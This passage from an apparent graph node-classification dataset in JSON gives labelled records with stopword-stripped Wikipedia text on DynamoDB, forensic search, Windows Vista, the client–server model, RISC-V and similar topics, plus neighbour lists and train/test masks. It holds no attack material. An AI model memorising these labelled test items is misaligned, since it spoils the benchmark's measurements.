leaders amazon engineers avoided dynamo originally due engineering overheads like provisioning managing partitions nodes response dynamodb team built service calls autoadmin manage database autoadmin replaces node stops responding copying data another node partition exceeds three thresholds rcu wcu 10gb autoadmin automatically add additional partitions segment data like indexing systems relational model dynamodb demands updates table reflected table ’ indices dynamodb handles using service calls “ log propagator ” subscribes replication logs node sends put update delete requests indices necessary indices result substantial performance hits write requests dynamodb allows user five given table suppose dynamodb user issues write operation put update delete typical relational system would convert sql query relational algebra run optimization algorithms dynamodb skips processes gets right work request arrives dynamodb request router authenticates–– “ request coming where/whom claims ” ––and checks authorization–– “ user submitting request requisite permissions ” assuming checks pass system hashes request ’ partition key arrive appropriate partition three nodes within copy partition ’ data system first writes leader node writes second node sends “ success ” message finally continues propagating third node writes consistent always travel first leader node finally log propagator propagates change indices index grabs index ’ primary key value item performs write index without log propagation operation update pre-existing item updated attribute may serve primary key index thus b tree index must update well b trees handle insert delete read operations practice log propagator receives update operation issues delete operation put operation indices suppose dynamodb user issues get operation request router proceeds authentication authorization next hash partition key arrive appropriate hash encounter problem three nodes eventual consistency one another decide investigate dynamodb affords user two options issuing read consistent eventually consistent consistent read visits leader node consistency-availability tradeoff rears head read-heavy systems always reading leader overwhelm single node reduce availability second option eventually consistent read selects random node practice dynamodb trades consistency availability take route odds inconsistency ’ need write operation return “ success ” begin propagating third node finish ’ also need get target third node means 1-in-3 chance inconsistency within write ’ propagation window long window number catastrophes could cause node fall behind vast majority cases third node up-to-date within milliseconds leader languages frameworks dynamodb binding include java javascript node.js go c .net perl php python ruby haskell erlang django grails dynamodb exposes performance metrics help users provision correctly keep applications using dynamodb running smoothly metrics tracked using aws management console using aws command line interface monitoring tool integrating amazon cloudwatch",
    "neighbors": [
      8962,
      8451,
      10628,
      3462,
      8582,
      1801,
      6027,
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      2328,
      4377,
      8986,
      1435,
      5660,
      9245,
      11038,
      6307,
      3876,
      11556,
      9766,
      5159,
      6444,
      5677,
      7983,
      8495,
      3121,
      7352,
      10681,
      2496,
      4289,
      11201,
      8644,
      9286,
      1224,
      5960,
      8520,
      7499,
      10185,
      4429,
      590,
      7248,
      1362,
      467,
      9682,
      2901,
      7802,
      7512,
      8921,
      734,
      735,
      6367,
      4194,
      11646,
      5732,
      9828,
      1001,
      8554,
      3819,
      5612,
      7660,
      10090,
      10737,
      3573,
      8181,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2218,
    "label": 4,
    "text": "Forensic_search:forensic search forensic search emerging field computer forensics forensic search focuses user created data email files cell phone records office documents pdfs files easily interpreted person forensic search differs computer forensic analysis seek review analyze lower level system files registry link files disk level issues commonly associated traditional computer forensic analysis forensic search emerged due number factors including objective forensic search software allow person general knowledge computers skilled document review investigation techniques undertake search user created electronically stored information esi data typically considered user created esi made emails documents pictures file types created user opposed data created computer operating system i.e registry files link files unallocated space controlled created computer user objective reviewing user created data find information may used base decisions part investigation forensic search software differs using native applications e.g outlook desktop search software e.g google desktop search data changes made data processing searching may impact results skew findings forensic search software also allow access base metadata items available via native application good example would metadata ms word documents number forensic search software products able perform data recovery range email file types examples using native application non-forensic application affect data forensic search software likened ediscovery review software however strictly case ediscovery review software dealing many type computer records search options offer extra functionality forensic search software features redaction legal hold standard ediscovery review software also case forensic search software meet higher end tasks outlined widely accepted electronic discovery reference model edrm tasks identification collection preservation presentation generally covered forensic search software however true ediscovery review generally domain qualified legal practitioners companies use term ediscovery become catchall circles processing searching electronically stored information esi however true representation term ediscovery detailed understanding ediscovery electronic discovery reference model edrm good guideline could said forensic search closely related early case assessment eca ediscovery eca require rigor full ediscovery review presenting data part report may used form decision evidence important data correctly represented reader understand case generating reports system created data registry files link files system created data costly exercise also case straightforward answer explanation example would attempting explain lay person method techniques decoding userassist key windows system registry userassist key hold great deal information actions user computer however explain key reviewer able identify key correctly interpret key setting keys often encoded rot 13 keys decoded human readable formats reviewer show setting relates case often time consuming review hundreds even thousands settings times deliver circumstantial sometimes contentious findings reviewing user created data e-mail contracts reporting understanding findings often much straight forward semi skilled user usually good grasp email works use day-to-day work legal person understand contract need specialist forensic knowledge lead much lower costs review less contentious circumstantial findings features forensic search software focused allowing user search view range data users ’ files one time specific features forensic search software many newer emerging fields computer forensics cloud forensics mobile phone forensics network forensics memory analysis browser forensics forensic triage internet forensics distant past computer forensic expert ’ common role attend person ’ house place work data center forensically 'image computers devices may involved case categorized collection phase collection phase complete images reviewed esi relevant supplied interested parties required computer forensic investigator good deal experience training process time consuming costly computer forensic expert ’ primary role investigate computer evidence esi may familiar entire case objectives case agent detective forensic accountant crime analyst often led non-perfect time consuming identification correct evidence items differing parties would immediately flag interest detective deep knowledge case parties involved may go unnoticed computer forensic expert example would email suspect another case suspect case contact phone calls witness suspect compound issue massive increase size data computer forensic expert needs collect often case computer hard drive able imaged example computer contains evidence big system shut take image mission critical server email server company file server rise cloud computing also added challenges collection evidence data requires collection review may reside cloud case computer available image forensic expert needs collect information using forensic software designed work certain cloud providers short collection evidence changed significantly past years recognizing challenges concept hybrid forensics discussed creation tools adopt different approach collecting data concept hybrid forensics selective collection data 'live systems way may considered reliable evidence court law enforcement organizations like many organizations divided skill specific units computer forensic cybercrime area units take responsibility aspects esi discussed forensic search point 5 units usually time poor resourced albeit time resources low main knowledge unit comes officers consultants 7+ years experience predates computer forensic degrees available officers become familiar time methodology using forensic analysis software package offer started field hence new officers resources become available forensic analysis software prioritized newer specific software newer forensic field types forensic search software become popular method reducing time cost search analysis larger data sets focusing user data often yields evidence results e-mail seductive powerful evidence personal plentiful candid adults e-mail primary means written communication lawyers think e-discovery e-mail crave surprise e-mail traffic sought-after fought-over esi new generation tools developed order address challenges faced digital forensic ediscovery practitioners",
    "neighbors": [
      4194,
      8389
    ],
    "mask": "Test"
  },
  {
    "node_id": 2219,
    "label": 4,
    "text": "Brian_Lord_(cyber_security_expert):brian lord cyber security expert brian richard lord born december 1965 former deputy director intelligence cyber operations government communications headquarters gchq cheltenham england managing director cyber pgi protection group international international consultancy specialising cyber security risk consulting brian lord born bradford december 1965 son computer programmer teacher mathematics educated bradford grammar school 1972-1984 brian lord served royal corps signals 1984 1992 joining civil service worked gchq 21 years leaving deputy director intelligence cyber operations awarded obe 2005 new year honours september 2013 joined pgi protection group international consultancy specialising cyber security risk consulting managing director cyber described telegraph leading thinker sector cyber warfare october 2017 lord cleared charge sexual assault gloucester crown court prosecutors present evidence plead guilty common assault placing hand woman knee 2 – 3 minutes party 2016 believed first person british legal history charged common assault particulars assault touching defendant knee according lawyer three judges questioned whether public interest continue case view minor nature",
    "neighbors": [
      4595
    ],
    "mask": "Test"
  },
  {
    "node_id": 2220,
    "label": 7,
    "text": "EthosCE:ethosce ethosce learning management system administration continuing medical education nursing pharmacy healthcare-related programs developed dlc solutions provides interfaces organizations produce manage continuing education websites distribution provided software-as-a-service web application administrative interface allows users administer system web browser supports online mobile registration learners communication in-person online training events application includes online transcripts tracking professional certifications integration accreditation council continuing medical education accme program reporting system pars web service ethosce course object api used define learning objects added workflow built support drupal nodes part course requirement workflow including multiple course objects api allows content/assessments non-drupal external objects delivered tracked course content provides access taking enrolling learners courses ethosce originally released 14 april 2009 dlc solutions version 7.4 discontinued support creating moodle course objects integrated external scorm/tincan/xapi player released 12 december 2014",
    "neighbors": [
      467,
      8644
    ],
    "mask": "Test"
  },
  {
    "node_id": 2221,
    "label": 2,
    "text": "Technical_features_new_to_Windows_Vista:technical features new windows vista windows vista formerly codenamed windows longhorn many significant new features compared previous microsoft windows versions covering aspects operating system addition new user interface security capabilities developer technologies several major components core operating system redesigned notably audio print display networking subsystems results work visible software developers end-users see appear evolutionary changes user interface part redesign networking architecture ipv6 incorporated operating system number performance improvements introduced tcp window scaling prior versions windows typically needed third-party wireless networking software work properly longer case windows vista includes comprehensive wireless networking support graphics windows vista introduces new well major revisions direct3d new display driver model facilitates new desktop window manager provides tearing-free desktop special effects cornerstones windows aero graphical user interface new display driver model also able offload rudimentary tasks gpu allow users install drivers without requiring system reboot seamlessly recover rare driver errors due illegal application behavior core operating system many improvements made memory manager process scheduler heap manager i/o scheduler kernel transaction manager implemented used data persistence services enable atomic transactions service used give applications ability work file system registry using atomic transaction operations windows vista features completely re-written audio stack designed provide low-latency 32-bit floating point audio higher-quality digital signal processing bit-for-bit sample level accuracy 144 db dynamic range new audio apis created team including steve ball larry osterman new audio stack runs user level thus increasing stability windows vista audio engine designed run faster windows xp audio engine tighter requirements audio buffer position accuracy also new universal audio architecture uaa model introduced replacing wdm audio allows compliant audio hardware automatically work windows without needing device drivers audio hardware vendor three major apis windows vista audio architecture applications communicate audio driver sessions sessions programmed windows audio session api wasapi general wasapi operates two modes exclusive mode also called dma mode unmixed audio streams rendered directly audio adapter application audio play signal processing effect exclusive mode useful applications demand least amount intermediate processing audio data want output compressed audio data dolby digital dts wma pro s/pdif wasapi exclusive mode similar kernel streaming function kernel mode programming required shared mode audio streams rendered application optionally applied per-stream audio effects known local effects lfx per-session volume control streams mixed global audio engine set global audio effects gfx may applied finally 're rendered audio device higher level apis waveform-audio interface wavexxx functions directsound use shared mode results pre-mixed pcm audio sent driver single format terms sample rate bit depth channel count format configurable end user control panel passing wasapi host-based audio processing including custom audio processing take place sample rate conversion mixing effects host-based processing modules referred audio processing objects apos components operate user mode portion architecture runs kernel mode audio driver contains port class driver vendor miniport driver vendor hal windows kernel mixer kmixer completely gone direct path directsound audio drivers directsound mme emulated session instances since whole point directsound acceleration allow hardware process unmixed audio content directsound accelerated audio model directsound3d supported also breaks eax extensions apis asio openal affected windows vista also includes new multimedia class scheduler service mmcss allows multimedia applications register time-critical processing run elevated thread priority thus ensuring prioritized access cpu resources time-sensitive dsp processing mixing tasks audio professionals new wavert port driver introduced strives achieve real-time performance using multimedia class scheduler supports audio applications reduce latency audio streams consequently user mode applications completely govern streams audio without code execution kernel runtime wavert allows user mode application direct access internal audio hardware buffers sample position counters data memory mapped audio hardware dma engine allows applications poll current position dma memory window hardware accessing wavert also supports notion hardware generated clock notification event similar asio api applications need poll current position n't want existing audio apis re-plumbed emulated use apis internally audio goes three apis applications work fault mme wavein/waveout emulation introduced windows vista sample rate conversion needed audible noise sometimes introduced playing audio web browser uses apis internal resampler longer configurable defaults linear interpolation lowest-quality conversion mode could set previous versions windows resampler set high-quality mode via hotfix windows 7 windows server 2008 r2 new digital signal processing functionalities room correction bass management loudness equalization speaker fill introduced speaker fill mixes 2-channel content use available speakers manner similar creative cmss bass management used redirect subwoofer signal main speakers channel missing feature called channel phantoming allows best use speakers redirecting sound missing channels speakers whether multi-channel stereo sound system home theater living room windows vista also includes ability calibrate speakers room placing microphone listener plans sit running wizard measures room response windows vista automatically set levels delay frequency balance channel accordingly position pcs equipped stereo headphones vista adds ability surround sound using new feature called headphone virtualization uses technology based upon head-related transfer function windows vista also includes ability use custom host-based digital signal processing effects part audio device manufacturer-supplied driver value-added features effects packaged user-mode system effect audio processing objects sapos sapos also reusable third-party software windows vista builds universal audio architecture new class driver definition aims reduce need third-party drivers increase overall stability reliability audio windows microsoft also included new high quality voice capture directx media object dmo part directshow allows voice capture applications instant messengers speech recognition applications apply acoustic echo cancellation microphone array processing speech signals windows vista first windows operating system include fully integrated support speech recognition windows 2000 xp speech recognition installed office 2003 included windows xp tablet pc edition windows speech recognition allows users control machine voice commands enables dictation many applications application fairly high recognition accuracy provides set commands assists dictation brief speech-driven tutorial included help familiarize user speech recognition commands training could also completed improve accuracy speech recognition windows vista includes speech recognition 8 languages release time english u.s. british spanish german french japanese chinese traditional simplified support additional languages planned post-release speech recognition vista utilizes version 5.3 microsoft speech api sapi version 8 speech recognizer speech synthesis first introduced windows windows 2000 significantly enhanced windows vista code name mulan old voice microsoft sam replaced two new natural sounding voices generally greater intelligibility anna lili latter capable speaking chinese screen-reader narrator uses voices also updated microsoft agent text speech applications use newer sapi 5 voices windows vista includes redesigned print architecture built around windows presentation foundation provides high-fidelity color printing improved use color management removes limitations current gdi-based print subsystem enhances support printing advanced effects gradients transparencies etc. color laser printers use xml paper specification xps print subsystem windows vista implements new xps print path well legacy gdi print path legacy support windows vista transparently makes use xps print path printers support otherwise using gdi print path documents intensive graphics xps printers expected produce much greater quality prints gdi printers networked environment print server running windows vista documents rendered client machine rather server using feature known client side rendering rendered intermediate form transferred server printed without additional processing making print servers scalable offloading rendering computation clients xps print path introduced windows vista supports high quality 16-bit color printing xps print path uses xml paper specification xps print spooler file format serves page description language pdl printers xps spooler format intended replacement enhanced metafile emf format print spooler format graphics device interface gdi print path xps xml-based specifically xaml-based color-managed device resolution independent vector-based paged document format encapsulates exact representation actual printed output xps documents packed zip container along text fonts raster images 2d vector graphics drm information printers supporting xps eliminates intermediate conversion printer-specific language increasing reliability fidelity printed output microsoft claims major printer vendors planning release printers built-in xps support provide better fidelity original document core xps print path xpsdrv xps-based printer driver includes filter pipeline contains set filters print processing modules xml-based configuration file describe filters loaded filters receive spool file data input perform document processing rendering pdl post-processing output pdl data printer consume filters perform single function watermarking page color transformations perform several print processing functions specific document parts individually collectively convert spool file page description language supported printer windows vista also provides improved color support windows color system higher color precision dynamic range also supports cmyk colorspace multiple ink systems higher print fidelity print subsystem also support named colors simplifying color definition images transmitted printer supporting colors xps print path automatically calibrate color profile settings used display subsystem conversely xps print drivers express configurable capabilities printer virtue xps printcapabilities class enable fine-grained control print settings tuned individual printing device applications use windows presentation foundation display elements directly print xps print path without need image colorspace conversion xps format used spool file represents advanced graphics effects 3d images glow effects gradients windows presentation foundation primitives processed printer drivers without rasterization preventing rendering artifacts reducing computational load legacy gdi print path used xps spool file used processing converted gdi image minimize processing done raster level print schemas provide xml-based format expressing organizing large set properties describe either job format print capabilities hierarchically structured manner print schemas intended address problems associated internal communication components print subsystem external communication print subsystem applications windows vista contains new networking stack brings large improvements areas network-related functionality includes native implementation ipv6 well complete overhaul ipv4 ipv6 supported networking components services user interface ipv6 mode windows vista use link local multicast name resolution llmnr protocol resolve names local hosts network dns server running new tcp/ip stack uses new method store configuration settings enables dynamic control require computer restart settings changed new stack also based strong host model features infrastructure enable modular components dynamically inserted removed user interface configuring troubleshooting working network connections changed significantly prior versions windows well users make use new network center see status network connections access every aspect configuration network browsed using network explorer replaces windows xp network places network explorer items shared device scanner file share network location awareness uniquely identifies network exposes network attributes connectivity type windows vista graphically presents different devices connected network network map view using lltd protocol addition network map uses lltd determine connectivity information media type wired wireless device implement lltd appear network map icon representing device allowing users one-click access device user interface lltd invoked provides metadata device contains static state information mac address ipv4/ipv6 address signal strength etc support wireless networks built network stack emulate wired connections case previous versions windows allows implementation wireless-specific features larger frame sizes optimized error recovery procedures windows vista uses various techniques like receive window auto-scaling explicit congestion notification tcp chimney offload compound tcp improve networking performance quality service qos policies used prioritize network traffic traffic shaping available applications even explicitly use qos apis windows vista includes in-built support peer-to-peer networks smb 2.0 improved network security windows vista supports 256-bit 384-bit diffie-hellman dh algorithms well 128-bit 192-bit 256-bit advanced encryption standard aes included network stack integrating ipsec windows firewall windows vista introduces overhaul previous windows nt operating system loader architecture ntldr used versions windows nt since inception windows nt 3.1 ntldr completely replaced new architecture designed address modern firmware technologies unified extensible firmware interface new architecture introduces firmware-independent data store backward compatible previous versions windows operating system windows vista introduces improved driver model windows driver foundation opt-in framework replace older windows driver model includes windows vista includes following changes enhancements processor power management windows vista first client version windows ship .net framework specifically includes .net framework 2.0 .net framework 3.0 previously known winfx version 1.0 1.1 .net framework set managed code apis slated succeed win32 win32 api also present windows vista give direct access new functionality introduced .net framework addition .net framework intended give programmers easier access functionality present windows .net framework 3.0 includes apis ado.net asp.net windows forms among others adds four core frameworks .net framework windows presentation foundation codenamed avalon overhaul graphical subsystem windows flagship resolution independent api 2d 3d graphics raster vector graphics xaml fixed adaptive documents xps advanced typography animation xaml data binding audio video windows vista wpf enables richer control design development visual aspects windows programs based directx renders graphics using direct3d routing graphics direct3d allows windows offload graphics tasks gpu reducing workload computer cpu capability used desktop window manager make desktop windows shell elements 3d surfaces wpf applications deployed desktop hosted web browser xbap 3d capabilities wpf limited compared available direct3d however wpf provides tighter integration features like user interface ui documents media makes possible 3d ui 3d documents 3d media set built-in controls provided part wpf containing items button menu list box controls wpf provides ability perform control composition control contain control layout wpf also built-in set data services enable application developers bind data controls images supported using windows imaging component media wpf supports audio video formats windows media player play addition wpf supports time-based animations contrast frame-based approach delinks speed animation slow fast system performing text anti-aliased rendered using cleartype wpf uses extensible application markup language xaml variant xml intended use developing user interfaces using xaml develop user interfaces also allows separation model view xaml every element maps onto class underlying api attributes set properties instantiated classes elements wpf may also coded .net language c xaml code ultimately compiled managed assembly way .net languages means use xaml development incur performance cost windows communication foundation codenamed indigo new communication subsystem enable applications one machine across multiple machines connected network communicate wcf programming model unifies web services .net remoting distributed transactions message queues single service-oriented architecture model distributed computing server exposes service via interface defined using xml clients connect wcf runs sandbox provides enhanced security model .net applications provide wcf capable using soap communication two processes thereby making wcf based applications interoperable process communicates via soap wcf process communicates non-wcf process xml based encoding used soap messages communicates another wcf process soap messages encoded optimized binary format optimize communication encodings conform data structure soap format called infoset windows vista also incorporates microsoft message queuing 4.0 msmq supports subqueues poison messages messages continually fail processed correctly receiver transactional receives messages remote queue windows workflow foundation microsoft technology defining executing managing workflows technology part .net framework 3.0 therefore targeted primarily windows vista operating system windows workflow foundation runtime components provide common facilities running managing workflows hosted clr application domain workflows comprise 'activities developers write domain-specific activities use workflows windows workflow foundation also provides set general-purpose 'activities cover several control flow constructs also includes visual workflow designer workflow designer used within visual studio 2005 including integration visual studio project system debugger windows cardspace codenamed infocard part .net framework 3.0 implementation identity metasystem centralizes acquiring usage management digital identity digital identity represented logical security tokens consist one claims provide information different aspects identity name address etc identity system centers around three entities — user identified identity provider provides identifying information regarding user relying party uses identity authenticate user identity provider may service like active directory even user provides authentication password biometric authentication data relying party issues request application identity means policy states claims needs physical representation security token application passes request windows cardspace contacts suitable identity provider retrieves identity provides application identity along information use windows cardspace also keeps track identities used represents visually identifiable virtual cards accessible user centralized location whenever application requests identity windows cardspace informs user identity used needs confirmation provides requestor identity windows cardspace presents api allows application use windows cardspace handle authentication tasks similarly api allows identity providers hook windows cardspace relying party appears service provides authentication credentials media foundation set com-based apis handle audio video playback provides directx video acceleration 2.0 better resilience cpu i/o memory stress glitch-free low-latency playback audio video also enables high color spaces multimedia processing pipeline directshow windows media sdk gradually deprecated future versions windows vista instant search index also accessed programmatically using managed well native code native code connects index catalog using data source object retrieved windows vista shell indexing service ole db provider managed code use msidxs ado.net provider index catalog name catalog remote machine also specified using unc path criteria search specified using sql-like syntax default catalog called systemindex stores properties indexed items predefined naming pattern example name location documents system exposed table column names system itemname system itemurl respectively sql query directly refer tables index catalogues use msidxs provider run queries search index also used via ole db using collatordso provider however ole db provider read-only supporting select group sql statements windows search api also used convert search query written using advanced query syntax natural query syntax natural language version aqs sql queries exposes method generatesqlfromuserquery method isearchqueryhelper interface searches also performed using search-ms protocol pseudo protocol lets searches exposed uri contains operators search terms specified aqs refer saved search folders well uri activated windows search registered handler protocol parses uri extract parameters perform search winsock kernel wsk new transport-independent kernel-mode network programming interface npi provides tdi client developers sockets-like programming model similar supported user-mode winsock sockets programming concepts exist user-mode winsock socket creation bind connect accept send receive winsock kernel completely new programming interface unique characteristics asynchronous i/o uses irps event callbacks enhance performance tdi supported windows vista backward compatibility windows vista includes specialized qos api called qwave quality windows audio/video experience pre-configured quality service module time dependent multimedia data audio video streams qwave uses different packet priority schemes real-time flows multimedia packets best-effort flows file downloads e-mails ensure real time data gets little delays possible providing high quality channel data packets windows filtering platform allows external applications access hook packet processing pipeline networking subsystem windows vista features update microsoft crypto api known cryptography api next generation cng cng extensible user mode kernel mode api includes support elliptic curve cryptography number newer algorithms part national security agency nsa suite b also integrates smart card subsystem including base csp module encapsulates smart card api developers write complex csps",
    "neighbors": [
      10243,
      4107,
      5643,
      4624,
      9745,
      11283,
      537,
      540,
      3102,
      4127,
      2593,
      4130,
      8227,
      8740,
      9762,
      1577,
      4138,
      2603,
      10281,
      1581,
      4141,
      9263,
      3122,
      4146,
      4148,
      1077,
      2101,
      8246,
      1081,
      8763,
      10812,
      5181,
      3648,
      9799,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10835,
      4692,
      10839,
      601,
      603,
      9819,
      3170,
      617,
      5225,
      622,
      9839,
      4210,
      7796,
      1656,
      7290,
      4731,
      639,
      10879,
      5761,
      8328,
      8841,
      6797,
      9869,
      2193,
      9874,
      10900,
      4248,
      3742,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      7342,
      10413,
      10414,
      5300,
      2749,
      8391,
      200,
      9420,
      7887,
      3283,
      214,
      2782,
      736,
      4321,
      9442,
      4836,
      4326,
      2279,
      1770,
      11498,
      3308,
      1776,
      10993,
      3315,
      7411,
      10486,
      3834,
      1791,
      8959,
      11519,
      6927,
      3856,
      8976,
      3351,
      8473,
      8985,
      11546,
      8988,
      4384,
      9505,
      5413,
      10024,
      3881,
      10026,
      10029,
      11570,
      1844,
      9525,
      11572,
      10039,
      6972,
      10557,
      6462,
      319,
      2368,
      3394,
      1347,
      1348,
      3916,
      3922,
      11605,
      4439,
      5465,
      5469,
      5470,
      2402,
      8040,
      4458,
      6506,
      9593,
      2943,
      3974,
      1418,
      5003,
      5004,
      11677,
      929,
      11683,
      430,
      6062,
      9654,
      9655,
      6584,
      1978,
      960,
      7108,
      8132,
      6088,
      969,
      3535,
      3538,
      8659,
      1498,
      5594,
      478,
      479,
      8161,
      6114,
      6115,
      2027,
      9196,
      6637,
      9709,
      6641,
      3571,
      3573,
      2556,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 2222,
    "label": 5,
    "text": "Client–server_model:client–server model client–server model distributed application structure partitions tasks workloads providers resource service called servers service requesters called clients often clients servers communicate computer network separate hardware client server may reside system server host runs one server programs share resources clients client share resources requests server content service function clients therefore initiate communication sessions servers await incoming requests examples computer applications use client–server model email network printing world wide web client-server characteristic describes relationship cooperating programs application server component provides function service one many clients initiate requests services servers classified services provide example web server serves web pages file server serves computer files shared resource may server computer software electronic components programs data processors storage devices sharing resources server constitutes service whether computer client server determined nature application requires service functions example single computer run web server file server software time serve different data clients making different kinds requests client software also communicate server software within computer communication servers synchronize data sometimes called inter-server server-to-server communication general service abstraction computer resources client concerned server performs fulfilling request delivering response client understand response based well-known application protocol i.e content formatting data requested service clients servers exchange messages request–response messaging pattern client sends request server returns response exchange messages example inter-process communication communicate computers must common language must follow rules client server know expect language rules communication defined communications protocol client-server protocols operate application layer application layer protocol defines basic patterns dialogue formalize data exchange even server may implement application programming interface api api abstraction layer accessing service restricting communication specific content format facilitates parsing abstracting access facilitates cross-platform data exchange server may receive requests many distinct clients short period time computer perform limited number tasks moment relies scheduling system prioritize incoming requests clients accommodate prevent abuse maximize availability server software may limit availability clients denial service attacks designed exploit server obligation process requests overloading excessive request rates bank customer accesses online banking services web browser client client initiates request bank web server customer login credentials may stored database web server accesses database server client application server interprets returned data applying bank business logic provides output web server finally web server returns result client web browser display step sequence client–server message exchanges computer processes request returns data request-response messaging pattern requests met sequence complete web browser presents data customer example illustrates design pattern applicable client–server model separation concerns early form client–server architecture remote job entry dating least os/360 announced 1964 request run job response output formulating client–server model 1960s 1970s computer scientists building arpanet stanford research institute used terms server-host serving host user-host using-host appear early documents rfc 5 rfc 4 usage continued xerox parc mid-1970s one context researchers used terms design computer network programming language called decode-encode language del purpose language accept commands one computer user-host would return status reports user encoded commands network packets another del-capable computer server-host received packets decoded returned formatted data user-host del program user-host received results present user client–server transaction development del beginning 1969 year united states department defense established arpanet predecessor internet client-host server-host subtly different meanings client server host computer connected network whereas words server client may refer either computer computer program server-host user-host always refer computers host versatile multifunction computer clients servers programs run host client–server model server likely devoted task serving early use word client occurs separating data function distributed file system 1978 paper xerox parc computer scientists howard sturgis james mitchell jay israel authors careful define term readers explain use distinguish user user network node client 1992 word server entered general parlance client–server model dictate server-hosts must resources client-hosts rather enables general-purpose computer extend capabilities using shared resources hosts centralized computing however specifically allocates large amount resources small number computers computation offloaded client-hosts central computers simpler client-hosts relies heavily network resources servers infrastructure computation storage diskless node loads even operating system network computer terminal operating system input/output interface server contrast fat client personal computer many resources rely server essential functions microcomputers decreased price increased power 1980s late 1990s many organizations transitioned computation centralized servers mainframes minicomputers fat clients afforded greater individualized dominion computer resources complicated information technology management 2000s web applications matured enough rival application software developed specific microarchitecture maturation affordable mass storage advent service-oriented architecture among factors gave rise cloud computing trend 2010s addition client–server model distributed computing applications often use peer-to-peer p2p application architecture client–server model server often designed operate centralized system serves many clients computing power memory storage requirements server must scaled appropriately expected work-load i.e number clients connecting simultaneously load-balancing failover systems often employed scale server implementation peer-to-peer network two computers peers pool resources communicate decentralized system peers coequal equipotent nodes non-hierarchical network unlike clients client–server client–queue–client network peers communicate directly peer-to-peer networking algorithm peer-to-peer communications protocol balances load even peers modest resources help share load node becomes unavailable shared resources remain available long peers offer ideally peer need achieve high availability redundant peers make resource downtime availability load capacity peers change protocol reroutes requests client-server master-slave regarded sub-categories distributed peer-to-peer systems",
    "neighbors": [
      10242,
      10245,
      7175,
      9225,
      4107,
      9744,
      7188,
      5658,
      6694,
      1586,
      1618,
      5214,
      3581,
      4194,
      10341,
      6769,
      119,
      7812,
      6281,
      3729,
      8871,
      7341,
      10926,
      8386,
      7364,
      10438,
      11472,
      9440,
      225,
      8929,
      9441,
      754,
      2804,
      10486,
      6403,
      1812,
      10518,
      5399,
      10522,
      6948,
      10535,
      7983,
      5936,
      8499,
      4919,
      5435,
      2887,
      5450,
      333,
      3920,
      337,
      2901,
      6487,
      5471,
      8036,
      362,
      11126,
      3450,
      2940,
      2432,
      10631,
      4490,
      398,
      3990,
      9112,
      6555,
      8608,
      5025,
      5029,
      3507,
      2996,
      11197,
      3007,
      8640,
      4033,
      2011,
      8682,
      5612,
      4589,
      7666,
      8189
    ],
    "mask": "Test"
  },
  {
    "node_id": 2223,
    "label": 0,
    "text": "Temporal_annotation:temporal annotation temporal annotation study automatically add semantic information regarding time natural language documents plays role natural language processing computational linguistics temporal annotation involves application semantic annotation document significant temporal annotation standards include timeml iso-timeml tides standards typically include annotations temporal expressions timexes events temporal relations temporal signals temporal relation types natural language texts events may associated times e.g. may start end given time events also associated events like occurring call relations temporal relations temporal relation typing classifies relation two arguments important difficult sub-task figuring temporal information document allen interval algebra one scheme types temporal relations rule-engineering machine learning approaches temporal annotation successful though achieving high performance temporal relation typing remains difficult task successful temporal annotation enables systems find facts asserted texts true build timelines extract plans discover mentions change applications many domains information extraction digital history processing social media clinical text mining tempeval task series sets shared temporal annotation task run semeval three times attracting system entries around world task originally centred determining types temporal relations tempeval-2 -3 expanded include event timex annotation addition i2b2 clinical evaluation shared task temporal annotation exercise 2012 attracted great deal interest",
    "neighbors": [
      1890,
      7780,
      1737,
      2059,
      5781,
      8440
    ],
    "mask": "Test"
  },
  {
    "node_id": 2224,
    "label": 3,
    "text": "RISC-V:risc-v risc-v pronounced risk-five open-source hardware instruction set architecture isa based established reduced instruction set computer risc principles project began 2010 university california berkeley many contributors volunteers affiliated university june 2019 version 2.2 user-space isa version 1.11 privileged isa frozen permitting software hardware development proceed debug specification available draft version 0.3 usable new isas usually expensive computer-designers normally afford work free also developing cpu requires design expertise several specialties electronic digital logic compilers operating systems rare find team outside professional engineering organization team normally paid money charged designs therefore commercial vendors computer designs arm holdings mips technologies charge royalties use designs patents copyrights also often require non-disclosure agreements releasing documents describe designs detailed advantages instruction set many cases never describe reasons design choices expense secrecy make development new hardware software much difficult also prevents security audits another result modern high-quality general-purpose computer instruction sets explained available except academic settings risc-v started solve problems goal make practical isa open-sourced usable academically hardware software design without royalties also rationales every part project explained least broadly risc-v authors academic substantial experience computer design risc-v isa direct development series academic computer-design projects originated part aid projects address cost design project started academic research funded darpa order build large continuing community users therefore accumulate designs software risc-v isa designers planned support wide variety practical uses small fast low-power real-world implementations without over-architecting particular microarchitecture need large base contributors part reason risc-v engineered fit many uses therefore many risc-v contributors see project unified community effort term risc dates 1980 knowledge simpler computers could effective design principles widely described simple effective computers always academic interest academics created risc instruction set dlx first edition computer architecture quantitative approach 1990 david patterson author later assisted risc-v. dlx intended educational use academics hobbyists implemented using field-programmable gate arrays commercial success arm cpus versions 2 earlier public-domain instruction set still supported gnu compiler collection gcc popular free-software compiler three open-source cores exist isa manufactured openrisc open-source isa based dlx associated risc designs fully supported gcc linux implementations however commercial implementations krste asanović university california berkeley found many uses open-source computer system 2010 decided develop publish one short three-month project summer plan help academic industrial users david patterson berkeley also aided effort originally identified properties berkeley risc risc-v one long series cooperative risc research projects stage students inexpensively provided initial software simulations cpu designs risc-v authors institution originally provided isa documents several cpu designs bsd licenses allow derivative works—such risc-v chip designs—to either open free closed proprietary early funding darpa commercial users require isa stable utilize product might last many years address issue risc-v foundation formed maintain publish intellectual property related risc-v definition original authors owners surrendered rights foundation designers say instruction set main interface computer lies hardware software good instruction set open available use dramatically reduce cost software permitting far reuse also increase competition among hardware providers use resources design less software support designers assert new principles becoming rare instruction set design successful designs last forty years become increasingly similar failed sponsoring companies failed commercially instruction sets poor technically well-designed open instruction set designed using well-established principles attract long-term support many vendors prior open isas used gnu general public license gpl encouraging users open implementations copying use others unlike academic designs optimized simplicity exposition designers state risc-v instruction set practical computers said features increase computer speed yet reduce cost power use include load–store architecture bit patterns simplify multiplexers cpu simplified standards-based floating-point design architecturally neutral placing most-significant bits fixed location speed sign-extension sign extension said often critical timing path instruction set designed wide range uses supports three word-widths 32 64 128 bits variety subsets definitions subset vary slightly three word-widths subsets support small embedded systems personal computers supercomputers vector processors warehouse-scale rack-mounted parallel computers instruction set 